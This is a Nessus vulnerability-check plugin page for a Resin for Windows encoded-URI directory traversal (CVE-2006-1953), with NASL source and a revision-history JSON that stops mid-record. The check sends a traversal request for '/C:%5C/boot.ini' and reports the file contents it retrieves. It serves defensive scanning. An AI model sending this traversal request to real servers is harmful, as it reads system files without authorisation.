Resin for Windows Encoded URI Traversal Arbitrary File Access
2006-05-27T00:00:00
ID RESIN_DIR_TRAVERSAL.NASL Type nessus Reporter Tenable Modified 2018-11-15T00:00:00
Description
The remote host is running Resin, an application server.
The installation of Resin on the remote host allows an unauthenticated
remote attacker to gain access to any file on the affected Windows
host, which may lead to a loss of confidentiality.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration branch: when `description` is set the script only publishes
# its metadata and exits; the actual check starts after the closing brace.
if (description)
{
script_id(21606);
script_version("1.23");
script_cvs_date("Date: 2018/11/15 20:50:25");
# Identifiers of the vulnerability this plugin reports against.
script_cve_id("CVE-2006-1953");
script_bugtraq_id(18005);
script_name(english:"Resin for Windows Encoded URI Traversal Arbitrary File Access");
script_summary(english:"Tries to retrieve boot.ini using Resin");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to directory traversal attacks.");
script_set_attribute(attribute:"description", value:
"The remote host is running Resin, an application server.
The installation of Resin on the remote host allows an unauthenticated
remote attacker to gain access to any file on the affected Windows
host, which may lead to a loss of confidentiality.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/434150/30/0/threaded");
script_set_attribute(attribute:"see_also", value:"http://www.caucho.com/download/changes.xtp");
script_set_attribute(attribute:"solution", value:"Upgrade to Resin 3.0.19 or later.");
# CVSSv2 base: network vector, low complexity, no authentication, complete
# confidentiality impact and no integrity/availability impact.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
# NOTE(review): revision 1.21 of this plugin (in the history on this page)
# set exploitability_ease to "Exploits are available", exploit_available to
# "true" and the temporal vector to E:ND; this revision downgrades all three
# while still declaring exploited_by_nessus "true" and ACT_ATTACK below.
# Confirm the downgrade is intentional rather than a metadata regression.
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/27");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:caucho:resin");
# The check below actively requests a file through the flaw, hence ATTACK
# category and exploited_by_nessus; safe-checks policies will skip it.
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Web Servers");
script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
# Runs only after the HTTP fingerprinting plugin and only when the
# www/resin KB key exists (presumably set by http_version.nasl -- verify).
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 8080);
script_require_keys("www/resin");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
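# Resin's default HTTP listener is 8080; a KB entry may override it.
port = get_http_port(default:8080);

# Unless the scan is paranoid, require a banner that names Resin so the
# traversal request below is only sent to a plausible target.
if (report_paranoia < 2)
{
banner = get_http_banner(port:port);
if (!banner) exit(1, "Unable to get the banner from web server on port "+port+".");
if ("Resin" >!< banner) exit(1, "The web server on port "+port+" does not appear to be Resin.");
}

# Probe: request a well-known Windows system file through the encoded-URI
# traversal (%5C is a URL-encoded backslash). boot.ini is chosen because its
# contents are predictable, which keeps the positive match below reliable.
# exit_on_fail guarantees r is populated past this point.
file = "boot.ini";
u = string("/C:%5C/", file);
r = http_send_recv3(method:"GET", item:u, port:port, exit_on_fail:TRUE);

# Vulnerable only if the response body carries the boot.ini section header;
# error pages or other content for the same URL are not reported.
if ("[boot loader]" >< r[2])
{
if (report_verbosity > 0)
{
# Build the displayed path from `file` so the report cannot drift from the
# probe; '\\' is an impure (single-quoted) string yielding one backslash.
report = '\n' +
"Nessus was able to retrieve the contents of '" + '\\' + file + "' using the" + '\n' +
'following URL :\n' +
'\n' +
' ' + build_url(port:port, qs:u) + '\n';
# Verbose reports include the retrieved file body as evidence.
if (report_verbosity > 1)
report += '\nHere is its contents :\n\n' + r[2] + '\n';
security_hole(port:port, extra:report);
}
else security_hole(port);
}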
{"id": "RESIN_DIR_TRAVERSAL.NASL", "bulletinFamily": "scanner", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.", "published": "2006-05-27T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "reporter": "Tenable", "references": ["https://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "cvelist": ["CVE-2006-1953"], "type": "nessus", "lastseen": "2019-01-16T20:06:38", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 1, "enchantments": {}, "hash": "c93d3b658f450eaf7aee9738a199dcf838bc7d5242533a8ac3dd529a24e02701", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "ae30ab679a4620946e7383f6006ba3c5", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": 
"07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "43a9587541518ac9911b427a02fc78b2", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2016-09-26T17:26:03", "modified": "2016-05-16T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.2", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"$Revision: 1.21 $\");\n script_cvs_date(\"$Date: 2016/05/16 14:22:07 $\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n script_osvdb_id(25570);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", 
value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the 
contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 6, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "c8d78dafe2d79e0fcde5a7b257542edbfc6215a30e2539b86ba49451428096b6", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}, {"hash": "8e42d3c54b9b50456eedee858f471fbf", "key": 
"sourceData"}, {"hash": "79a3d069e1f4328741af17d3fccf32cd", "key": "references"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-11-17T03:11:56", "modified": "2018-11-15T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["https://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", 
"type": "nessus", "viewCount": 1}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-17T03:11:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 3, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "b79374dd28ba9cc78d9fcaa95cfe0cd813d0d73bd315bc30ccb5bbd6047a9c8c", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "9570f8e4e9af170494f007d8a35f0a26", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "13dd5af15e7bb84751f8448055a796c1", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-07-30T14:16:41", "modified": "2018-07-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": 
"2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n 
script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-30T14:16:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe 
installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 2, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "532cc1f2321277ab27e9eb978a647c0316dd88af739d2c3361f01b9da47e58d8", "hashmap": [{"hash": "1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "ae30ab679a4620946e7383f6006ba3c5", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}, {"hash": "43a9587541518ac9911b427a02fc78b2", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2017-10-29T13:43:25", "modified": "2016-05-16T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"$Revision: 1.21 $\");\n script_cvs_date(\"$Date: 2016/05/16 14:22:07 $\");\n\n 
script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n script_osvdb_id(25570);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated\nremote attacker to gain access to any file on the affected Windows\nhost, which may lead to a loss of confidentiality.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/434150/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.caucho.com/download/changes.xtp\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Resin 3.0.19 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:caucho:resin\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n 
script_require_keys(\"www/resin\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\n\n# Unless we're paranoid, make sure the banner is from Resin.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (!banner) exit(1, \"Unable to get the banner from web server on port \"+port+\".\");\n if (\"Resin\" >!< banner) exit(1, \"The web server on port \"+port+\" does not appear to be Resin.\");\n}\n\n\n# Try to exploit the issue to get a file.\nfile = \"boot.ini\";\nu = string(\"/C:%5C/\", file);\nr = http_send_recv3(method:\"GET\",item:u, port:port, exit_on_fail:TRUE);\n\n# There's a problem if looks like boot.ini.\nif (\"[boot loader]\">< r[2])\n{\n if (report_verbosity > 0)\n {\n report = '\\n' +\n\"Nessus was able to retrieve the contents of '\\boot.ini' using the\" + '\\n' +\n'following URL :\\n' +\n'\\n' +\n' ' + build_url(port:port, qs:u) + '\\n';\n\n if (report_verbosity > 1)\n report += '\\nHere is its contents :\\n\\n' + r[2] + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\n", "title": "Resin for Windows Encoded URI Traversal Arbitrary File Access", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:43:25"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:caucho:resin"], "cvelist": ["CVE-2006-1953"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "description": "The remote host is running Resin, an application server.\n\nThe installation of Resin on the remote host allows an unauthenticated remote attacker to gain access to any file on the affected Windows host, which may lead to a loss of confidentiality.", "edition": 5, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "b79374dd28ba9cc78d9fcaa95cfe0cd813d0d73bd315bc30ccb5bbd6047a9c8c", "hashmap": [{"hash": 
"1815f28d0d26a69f69e9aa346cfb841d", "key": "title"}, {"hash": "8969ce418fdd25af1ed884467625a5ca", "key": "href"}, {"hash": "9570f8e4e9af170494f007d8a35f0a26", "key": "modified"}, {"hash": "6f10b73f4afe1b28494745550233b016", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "878579eaa9f4f2a252e909b75890c924", "key": "pluginID"}, {"hash": "313104e31e57b9f7aa405f5f0fc56a4e", "key": "cvss"}, {"hash": "05304142f12617fe4e16be3bc21e8470", "key": "published"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f2e2b4ef6864133ea892585933598162", "key": "references"}, {"hash": "84160926c2065f36145233973e942186", "key": "description"}, {"hash": "13dd5af15e7bb84751f8448055a796c1", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "b51224ecfbf0f2e065b2f0cbb0c2e9ec", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21606", "id": "RESIN_DIR_TRAVERSAL.NASL", "lastseen": "2018-09-02T00:03:11", "modified": "2018-07-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "21606", "published": "2006-05-27T00:00:00", "references": ["http://www.securityfocus.com/archive/1/434150/30/0/threaded", "http://www.caucho.com/download/changes.xtp"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21606);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/27 18:38:15\");\n\n script_cve_id(\"CVE-2006-1953\");\n script_bugtraq_id(18005);\n\n script_name(english:\"Resin for Windows Encoded URI Traversal Arbitrary File Access\");\n script_summary(english:\"Tries to retrieve boot.ini using Resin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is prone to directory traversal attacks.\");\n 
